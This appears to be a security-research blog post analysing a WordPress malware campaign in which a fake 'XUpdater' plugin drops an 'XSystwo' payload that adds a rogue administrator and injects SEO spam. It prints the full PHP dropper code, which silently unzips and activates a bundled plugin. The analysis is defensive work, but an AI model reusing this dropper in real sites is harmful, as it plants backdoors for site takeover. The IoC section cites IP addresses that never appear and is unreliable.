New Malware Camxpaign: XUpdater and XSystwo
A new and sophisticated malware campaign has been identified, targeting web infrastructure and leveraging compromised credentials to gain initial access. Our research team has uncovered a multi-stage infection process involving a dropper disguised as a legitimate WordPress plugin, followed by a malicious payload responsible for the core malicious activity.
Infection Vector: Compromised Credentials and Initial Dropper
The initial stage of the attack relies heavily on previously compromised credentials, likely obtained through prior data breaches, phishing, or brute-force attacks. Once access is gained to a target WordPress’s administrative panel, the attackers install a fake plugin that acts as a primary dropper.
This initial dropper is deceptively simple and appears in relatively clear text, allowing it to bypass basic signature-based scanning while maintaining polymorphism. The plugin names observed follow a pattern of "XUpdater" with incrementing version numbers, such as:
- XUpdater14
- XUpdater15
- XUpdater16
- ...and subsequent variations.
The primary function of this initial "XUpdater" plugin is to install and deploy the secondary, which is the payload that contains the malware. The plugin basically calls a ZIP file with random names, and then deploys this as the XSystwo plugin as we can observe on the following sample of a XUpdater15 variation of this dropper:
<?php
/**
* Plugin Name: XWP Installer15
* Description: XWP Installer15
* Version: 1.2
* Author: WordPress
*/
register_activation_hook(__FILE__, 'xwp_installer_activate_15');
function xwp_installer_activate_15() {
$zip_file = plugin_dir_path(__FILE__) . 'Sys3847LockU.zip';
$plugin_dir = ABSPATH . 'wp-content/plugins/';
$plugin_entry = 'XSystwo/XSystwo.php';
update_option('xwp_curr_posts', 0);
update_option('xwp_last_create', 0);
update_option('xwp_key', 0);
require_once ABSPATH . 'wp-admin/includes/file.php';
require_once ABSPATH . 'wp-admin/includes/plugin.php';
WP_Filesystem();
global $wp_filesystem;
if (file_exists($zip_file)) {
$result = unzip_file($zip_file, $plugin_dir);
if (function_exists('wp_clean_plugins_cache')) {
wp_clean_plugins_cache(true);
}
sleep(1);
if (!is_plugin_active($plugin_entry)) {
$activation = activate_plugin($plugin_entry);
}
}
}
The Malicious Payload: XSystwo
The second stage of the infection involves the deployment of a new plugin, which they have named XSystwo. This payload is the core component of the campaign, responsible for performing the actual malicious activities, which primarily center around creating a rogue WordPress Administrator tied to a wordpress[.]com email account, injecting SEO SPAM and disabling caching plugins.
Below are the most interesting files:
./XSystwo/XSystwo.php
./XSystwo/ID200/class.01.php
./XSystwo/ID200/ID200.php
./XSystwo/ID100/SXCAPTH.php
Indicators of Compromise (IoC)
Security administrators are urged to check their systems immediately for the presence of these files and monitor network traffic for connections to the identified malicious IP addresses.
Note: The specific IP addresses provided above are the ones observed during the investigation. Specific, actionable IPs should be validated with your threat intelligence feeds.
